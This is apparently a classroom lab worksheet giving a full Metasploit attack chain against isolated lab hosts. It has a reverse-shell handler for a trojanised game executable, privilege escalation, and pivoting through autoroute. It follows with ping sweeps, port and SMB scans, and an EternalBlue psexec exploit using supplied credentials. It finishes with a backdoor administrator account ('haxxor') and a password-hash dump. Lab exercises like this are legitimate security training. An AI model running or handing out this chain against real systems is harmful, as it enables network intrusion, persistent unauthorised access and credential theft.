Activity 6.12.4


--------------------------------------------------------------------
On Kali:

# Prepare a handler to receive the malware connection on port 80

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 172.16.0.200
set lport 80
show options
run

---------------------------------------------------------------------
# On XP-PRO:
Double-click minecraft-mini.exe to "play" the game

----------------------------------------------------------------------

# On Kali:

Verify that the infected game connected to your handler, 
and that you have a meterpreter> prompt

# Determine the internal subnet ID
# At the meterpreter> prompt enter:

getuid
getsystem
getuid
route (identify the internal IP subnet)
background
sessions (make note of the meterpreter session #)

# Create a pivot using meterpreter as a 
# pipeline into the internal network

search autoroute
use post/multi/manage/autoroute
set session 1
run

# Conduct a ping sweep of the internal network

search ping_sweep 
use post/multi/gather/ping_sweep
show options
set rhosts 10.10.10.0/24
set session 1
run    (make note of the discovered IP addresses)

# Port scan the internal hosts

search portscan
use auxiliary/scanner/portscan/tcp
show options
set ports 80,135,139,445,1433,3389
set rhosts 10.10.10.10-12
run

# ID the internal host OS versions

search scanner/smb
use auxiliary/scanner/smb/smb_version
show options
set rhosts 10.10.10.10-12
set threads 3
run  (see if the scan identifies the OS-is one of them Server 2016?)

# Attempt an Eternal Blue PSEXEC buffer overflow attack against Server2016

search eternal
use <exploit/windows/smb/ms17_010_psexec>
show options
search payload windows/x64/meterpreter
set payload windows/x64/meterpreter/bind_tcp
set rhosts <server2016 IP>
set lhost <Kali IP>
set smbuser moo
set smbpass 1Password
show options
run

# Get information from Server2016

getuid

# Drop to a Windows command prompt (shell)

shell

# Create a backdoor administrator account

net user haxxor Letmein! /add
net localgroup administrators /add haxxor

# Return to meterpreter and dump Server2016 password hashes

sessions
sessions 2

search hashdump

use post/windows/gather/smart_hashdump
show options
set session 2
run













